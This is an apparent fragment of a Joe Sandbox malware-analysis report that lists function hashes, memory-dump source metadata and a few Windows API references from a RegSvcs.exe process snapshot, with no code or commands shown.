                                                                                • Opcode ID: 9f2217f24eea5da6d305051cae18358e10787baba71cda17f4d19ed1a34f9827
                                                                                • Instruction ID: 4c97efdda60d95c7b83fc2b90009d4b7d1ba60afca2940e32689ada65f606c64
                                                                                • Opcode Fuzzy Hash: 9f2217f24eea5da6d305051cae18358e10787baba71cda17f4d19ed1a34f9827
                                                                                • Instruction Fuzzy Hash: 8D318F6050D3E28ADF368B3595687BBBBE09F53214F944A9DD0DD9B282CB384406CB17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: J
                                                                                • API String ID: 0-1141589763
                                                                                • Opcode ID: 77f9c0abf6a08f5a23f61e0a4ab031430b1dc9ffb9ca7a4849c5a7077fb92811
                                                                                • Instruction ID: 082b0546ef60b0714dfce9d4aa827d655dfe368a9e8240b7501b18b2f780f11d
                                                                                • Opcode Fuzzy Hash: 77f9c0abf6a08f5a23f61e0a4ab031430b1dc9ffb9ca7a4849c5a7077fb92811
                                                                                • Instruction Fuzzy Hash: EF0145B27892928BD305CF3AC46027ABBE19FDB311F1D496ED4C11B2C0D638994B9B56
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 86a2074b00e04dc7b850b2ec3c3c308fa2b439473906ddc9b3849ea1491a9af8
                                                                                • Instruction ID: 62b3322bbf7b3275c1d48c2b5dc5d8c4126ef63ee04c6e1df3d0a3071948ead2
                                                                                • Opcode Fuzzy Hash: 86a2074b00e04dc7b850b2ec3c3c308fa2b439473906ddc9b3849ea1491a9af8
                                                                                • Instruction Fuzzy Hash: 7712333AA19215CFD344CF68E8D026AB3E2FB8A315F0E84BEC98593361D735D851CB85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 498b38226d149927242646e455dad2fe188806395e956318dfec649023252354
                                                                                • Instruction ID: eb5979ea8a6da1f4da151cf0b372db5bfa8560283cfaa0591c77721a8962883e
                                                                                • Opcode Fuzzy Hash: 498b38226d149927242646e455dad2fe188806395e956318dfec649023252354
                                                                                • Instruction Fuzzy Hash: 46229231A0C7118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B8518B4B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3bbaac9a08f0af888c577097dfb5043357bd1c2b2d978a7a4eef91d36ae61b2
                                                                                • Instruction ID: c63c5de1158fe26ea098f5203b4724c8144c42eb413dd54cc96740bd1e76dd0e
                                                                                • Opcode Fuzzy Hash: a3bbaac9a08f0af888c577097dfb5043357bd1c2b2d978a7a4eef91d36ae61b2
                                                                                • Instruction Fuzzy Hash: 0C02013AA19211CFD744CF69E8D026AB3E2FBCA315F0E84BEC94593361D7359851CB85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b6e52075dc4eb7324e790005a40ba8a85298239228d76690f7b5d6d596ea5599
                                                                                • Instruction ID: f8c91cab1110fd396ac5906ab11d171be5dc0b54383014364ff63dd626a6dee8
                                                                                • Opcode Fuzzy Hash: b6e52075dc4eb7324e790005a40ba8a85298239228d76690f7b5d6d596ea5599
                                                                                • Instruction Fuzzy Hash: 3902023AA19211CFD344CF69E8D026AB3E2FBCA315F1E84BEC94593361D7359851CB85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ffa534ad8b940cc2844a7d7ccf34365b4447b15f87e3a7ddba1458b7d3c2b80f
                                                                                • Instruction ID: 531b97af5d5d1195029069a629f64b316ac07a8eee3f313c9b3f94386e1f818a
                                                                                • Opcode Fuzzy Hash: ffa534ad8b940cc2844a7d7ccf34365b4447b15f87e3a7ddba1458b7d3c2b80f
                                                                                • Instruction Fuzzy Hash: CB02123AA19211CFD344CF69E8D026AB3E2FBCA315F1E84BEC94593361D7359852CB85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ebee816302b67cf92673de760ab4081bd9cc29308ce015345c2827ac3cbaf5db
                                                                                • Instruction ID: aabde88e38feca61f641d6a10280b76e9ff7d1afebe6f9730e3a4a29ba7b4e00
                                                                                • Opcode Fuzzy Hash: ebee816302b67cf92673de760ab4081bd9cc29308ce015345c2827ac3cbaf5db
                                                                                • Instruction Fuzzy Hash: 00F1113AA05215CFD744CF69E8E026AB3E2FB8A314F0E84BED94593361D734E951CB84
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a1d79b1864b16faccb2a51a418b04fb75abf9fe443ae4a84f275528856371a3c
                                                                                • Instruction ID: 1a0e16b40de3559a1275c81b5a1bc6c7fbfd5e278547d194ff46644d55a6738f
                                                                                • Opcode Fuzzy Hash: a1d79b1864b16faccb2a51a418b04fb75abf9fe443ae4a84f275528856371a3c
                                                                                • Instruction Fuzzy Hash: 37E1113AA09211CFD744CF69E8A166AB7E2FBCA314F0E84BED58593361D7349801CB95
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9876c15cb76decb0a99db45760057892f3e14ee88b8d238bf4c06b39bf0a259a
                                                                                • Instruction ID: 19e27db1c2ba9043135181e7a7e75dc30f950940a0d2a863ad67e97ea4b73182
                                                                                • Opcode Fuzzy Hash: 9876c15cb76decb0a99db45760057892f3e14ee88b8d238bf4c06b39bf0a259a
                                                                                • Instruction Fuzzy Hash: 98E1223AA09215CFD708CF29D8A166AB7E2FFCA315F0E84BED48593351D7349842CB95
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cfe141585ef6bb4fd5d1900630b709b8ffedb707c9face4b923ee56d76cc22fc
                                                                                • Instruction ID: 2f82df5762e349e4b7c21d0cd249c67d1745d7968b9a44aab63a65c3763efa9b
                                                                                • Opcode Fuzzy Hash: cfe141585ef6bb4fd5d1900630b709b8ffedb707c9face4b923ee56d76cc22fc
                                                                                • Instruction Fuzzy Hash: D3B15971B143209BD720DF24E88267B73E1EFE1354F99452EE885973A1E638AD05C356
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 703a5fce5a858795dea51b4aa39a7f74087463a9e4d65d171bdb9c65ccfe68e5
                                                                                • Instruction ID: c3b8a3ce4400bdfd2b8ceaaeb6d12f3be7039b02908a06be68da446465fd2ea3
                                                                                • Opcode Fuzzy Hash: 703a5fce5a858795dea51b4aa39a7f74087463a9e4d65d171bdb9c65ccfe68e5
                                                                                • Instruction Fuzzy Hash: 05C126B59087108FC7109F28D89166BB7F1EF86304F48496EF5D287391E7399915CB46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1a2bdf41f31732e4c6f134e22984b10fccd43771190b3506c22559857a532f66
                                                                                • Instruction ID: acf7d6eb1fd0beffcc208e149d5af4f14f298931f4f6355473ea98819c0069f7
                                                                                • Opcode Fuzzy Hash: 1a2bdf41f31732e4c6f134e22984b10fccd43771190b3506c22559857a532f66
                                                                                • Instruction Fuzzy Hash: 6F81FF35604311ABD728DF19D9A0A2BB3B2FFD9310F59852DE8864B3A0DB74EC01CB49
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed103d9790a9fb5ddc273fc5ed999194a7eb80532fdb02146527aa4ca58315a6
                                                                                • Instruction ID: fcc4ef8906273e26e2b73612c0272a0eebc0e55913028a914e4f141ce94aca3e
                                                                                • Opcode Fuzzy Hash: ed103d9790a9fb5ddc273fc5ed999194a7eb80532fdb02146527aa4ca58315a6
                                                                                • Instruction Fuzzy Hash: 5A51F3701083418BC714CF24C8A16ABBBF1EFD7328F185A5DE4D59B3A2E3388945CB5A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 14859b2b9f13445d7ed77bb32f2f3a4b3d5a603a55826ee409fb3effb04843dc
                                                                                • Instruction ID: 89edec5272deaaf5f630e04954ad2d7323f258436b11c01fc1b43be50c2e0e10
                                                                                • Opcode Fuzzy Hash: 14859b2b9f13445d7ed77bb32f2f3a4b3d5a603a55826ee409fb3effb04843dc
                                                                                • Instruction Fuzzy Hash: E1315BB5A043147BE7106B25DD81B3BB7E4DF8A718F10682DF88673251E335ED05875A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3fbc8bc4b44a427c4cba67ead08473481864dcf3b2e6af6cf0356a065fd6d9f4
                                                                                • Instruction ID: f998f188ce71fc941133ba929fd4c797c73404c3ebd75e23227982fd4a5faee5
                                                                                • Opcode Fuzzy Hash: 3fbc8bc4b44a427c4cba67ead08473481864dcf3b2e6af6cf0356a065fd6d9f4
                                                                                • Instruction Fuzzy Hash: 7F210577B586100BE7288E69D89127AF6C297C5314F0D973D888AE7345D9298C068285
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5189f7f754b6fb91a9a9405773335c7fbea09dec44e8bb6762b09cd96be8ce1
                                                                                • Instruction ID: 05196f0017333310b2261876cf81697d3c008b21ce9c304080e7406656f5b35a
                                                                                • Opcode Fuzzy Hash: b5189f7f754b6fb91a9a9405773335c7fbea09dec44e8bb6762b09cd96be8ce1
                                                                                • Instruction Fuzzy Hash: E4215E21744114478B2C9E5988A617FF3E5DBDE724F0992BFDD82CB281E634DC4483E5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f818b8447f15f1ee407da1b9d753d58744505a89c7b67eb43bb65d4b645e8166
                                                                                • Instruction ID: 445db1ca4e47d81e57dfafbff903e259d380a6b483c30bb8ae78e0290a368d1d
                                                                                • Opcode Fuzzy Hash: f818b8447f15f1ee407da1b9d753d58744505a89c7b67eb43bb65d4b645e8166
                                                                                • Instruction Fuzzy Hash: DB21E431E052008BD314EF1AC885767B7E1EFDA720F18992EE4988B3D1D33D8C869B95
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a83fc4a88d21c90a6c6269c88aa4a454e51d69233c48f7687c9df48d6135aa9a
                                                                                • Instruction ID: 1acfdcd2ad91985df4ff94691e1bc62aa99ccb40793d71524eb8d180ff9fb813
                                                                                • Opcode Fuzzy Hash: a83fc4a88d21c90a6c6269c88aa4a454e51d69233c48f7687c9df48d6135aa9a
                                                                                • Instruction Fuzzy Hash: FE215B3B92D320CAE7005F28D8503A6B7E1EF8A314F0A547AC984873C5D7B9C545C3AA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                • Instruction ID: bd610c7c2afde0dcf7e03cb09b95065097d2fc251fbd730a37f084e719301918
                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                • Instruction Fuzzy Hash: 0D11A933A056D40EC3168D3C8401565FFA30AA7635F6D939EF4B89B2D2DA278D8A8359
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 174d1cacc6f3bb9383e3a25fe060ee39e1b2ec2a632fd3250ee70535c7d4f271
                                                                                • Instruction ID: 99fa19e3527875d1d1dabbabd89d5df7efb7d9b9a3e90f7e6d034292f7b43a4a
                                                                                • Opcode Fuzzy Hash: 174d1cacc6f3bb9383e3a25fe060ee39e1b2ec2a632fd3250ee70535c7d4f271
                                                                                • Instruction Fuzzy Hash: DE019EB170071997D720AE11B4C1B2BA3A8AF8470CF5C443EE8449B343DB79EC0AC6D9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: adf3447fb43ab27f48027b3b6a76690fb6f6166c529701092d72560a22d25166
                                                                                • Instruction ID: 6fa01f9a0911098674b7d2d3d6a15f0c3bfef27f76f8a701a24a159e9650d2cb
                                                                                • Opcode Fuzzy Hash: adf3447fb43ab27f48027b3b6a76690fb6f6166c529701092d72560a22d25166
                                                                                • Instruction Fuzzy Hash: F11159796617418FD734CF349454177FBF1AF96200B28856DC0C35B784D778A85A8F8A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad29bda9b56c2bdb66dd60eb51d47c500f571fe48f64c7f6549833896b1aac87
                                                                                • Instruction ID: 37caf380a8a6f6e8e4e12164a9323a73680ed764f54332d60ed685ad2c97f53e
                                                                                • Opcode Fuzzy Hash: ad29bda9b56c2bdb66dd60eb51d47c500f571fe48f64c7f6549833896b1aac87
                                                                                • Instruction Fuzzy Hash: 510145B1A482928BE315CF3A8820167BBE1EFD7314F284A5DC4C1132A4D734990B8B4A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9f5541cda0806d0a244862385973e0e7b72d9463d2c4fb8e568f0ab9e85ae9bd
                                                                                • Instruction ID: 3826a2f4d34661e7b8ed0faf4efcefe4cecdc48fd0d3057ecb0392de341d489e
                                                                                • Opcode Fuzzy Hash: 9f5541cda0806d0a244862385973e0e7b72d9463d2c4fb8e568f0ab9e85ae9bd
                                                                                • Instruction Fuzzy Hash: 07018C35A092404FD3A8CF3598D212BB7E2EB96709F59A83DD4C293722D675C8038F49
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 06298510a6b8b311c949050cfea925265fa2d209eec18fecaf338ef547c90fc4
                                                                                • Instruction ID: 734103ef498f6d2f6035920d46ea6d367fcb550bcebe0eaacffd4b72fbe1d5de
                                                                                • Opcode Fuzzy Hash: 06298510a6b8b311c949050cfea925265fa2d209eec18fecaf338ef547c90fc4
                                                                                • Instruction Fuzzy Hash: DDF0F93560230C6BC1129B07DC85D37B3AEF78EB28F141729F515122E1E322FD1187A9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1605d0f2c2555b108b4dfd5660b877a0c3c861da1640c56d3df244d8ec661a85
                                                                                • Instruction ID: b876baa43a5ea7a567138825b7739408d186243299e95ed26cd5b31216e07757
                                                                                • Opcode Fuzzy Hash: 1605d0f2c2555b108b4dfd5660b877a0c3c861da1640c56d3df244d8ec661a85
                                                                                • Instruction Fuzzy Hash: 5DF0E9B6A846A28BD301CF3AD460372B7F19F97300F1D185ED4C117390D734684ADB45
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                • Instruction ID: c1ca0629f8cf8b0d053372cb86c4ddd525aa18f626ecc2807fb52cabf95be064
                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                • Instruction Fuzzy Hash: D4D097349083A00E67188D3800A04B7FBF8E947612F18148FE8E1E3244C228DC01439C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ec5ba2d4d41163eb9e6bb4d8e879822de04ac4a49255b6e4eabaae28b55b4ff7
                                                                                • Instruction ID: a6c7f8dd5cc435003ff5f9308aae27ad3397a5284e05f1bbf1f4cf535cc14d1e
                                                                                • Opcode Fuzzy Hash: ec5ba2d4d41163eb9e6bb4d8e879822de04ac4a49255b6e4eabaae28b55b4ff7
                                                                                • Instruction Fuzzy Hash: 09D05EABE621001B96099B11EC53779712286D7208B4CB438D90182346FB2CE106841A
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(CA4CF447,00000000,00000800), ref: 0042E044
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: *$M^z$M^z
                                                                                • API String ID: 1029625771-1694413495
                                                                                • Opcode ID: 296bc1e778d282a56ff129724f18974ba76126007a0c58df87a054d441982d11
                                                                                • Instruction ID: c3a321ed1c1e6dea5d0d0cc0a19081a04f89982c188b5c9145a64382f9347cb4
                                                                                • Opcode Fuzzy Hash: 296bc1e778d282a56ff129724f18974ba76126007a0c58df87a054d441982d11
                                                                                • Instruction Fuzzy Hash: 9B413672A5C7908AD7398F34D8813E7BBE2ABD6304F49866DC4D88B395CB7C44068796
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(CA4CF447,00000000,00000800), ref: 0042E044
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: *$M^z$M^z
                                                                                • API String ID: 1029625771-1694413495
                                                                                • Opcode ID: 3967bb3e94403ce82a075191e906a99e8253534b350ef48352ef493b3245fb97
                                                                                • Instruction ID: c83dcb8ea6467d8a27969621bf7304ff981d4a27aa5c352e7417a242782cea7f
                                                                                • Opcode Fuzzy Hash: 3967bb3e94403ce82a075191e906a99e8253534b350ef48352ef493b3245fb97
                                                                                • Instruction Fuzzy Hash: B4412572A5C7908AD3388F34DD853D7BAA2ABD9304F498A6DC4DC8B395CB3C44068786
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428BED
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428D1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: G-A
                                                                                • API String ID: 237503144-2138812890
                                                                                • Opcode ID: aaec1eb5ce232b40fcfb5e1d3827f736acd698aea67f82b3ebd54ef8f883d234
                                                                                • Instruction ID: c1c5549c8845c24fda813494c89da3ea3ee7197efa3d604dfae6a6144302c7fd
                                                                                • Opcode Fuzzy Hash: aaec1eb5ce232b40fcfb5e1d3827f736acd698aea67f82b3ebd54ef8f883d234
                                                                                • Instruction Fuzzy Hash: E65166B810D3949BE354DF25D88075FBBE1FBD6700F04892CE6956B781C7B588028B8B
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-3916222277
                                                                                • Opcode ID: f3f380718c7dc2b40a1ba8864b47347a1ff10d068b082ec6d531b53ad2f9b129
                                                                                • Instruction ID: dab4e135cf8f85a5715b0ab33c188f21f60693ba5c6c25c5b6c62133a61191db
                                                                                • Opcode Fuzzy Hash: f3f380718c7dc2b40a1ba8864b47347a1ff10d068b082ec6d531b53ad2f9b129
                                                                                • Instruction Fuzzy Hash: 7231B2B49143149FDB00EF68D98464EBFF4BB89304F02856EE888DB360D774A948CF96
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: Mw
                                                                                • API String ID: 3664257935-2910736759
                                                                                • Opcode ID: 6ea8de8f2246888cee862ffbd9dca0d1248c9e5ade27dd994aab7a8fcbc90c2a
                                                                                • Instruction ID: 6324e4a7e69e4386d62579ddba2e326e33637361d0d76bce3af04fa1da82e873
                                                                                • Opcode Fuzzy Hash: 6ea8de8f2246888cee862ffbd9dca0d1248c9e5ade27dd994aab7a8fcbc90c2a
                                                                                • Instruction Fuzzy Hash: 4BC00239412020BBDE816FA8FC8A91C3B22FB9230532D5034E50281036EA326960AA5D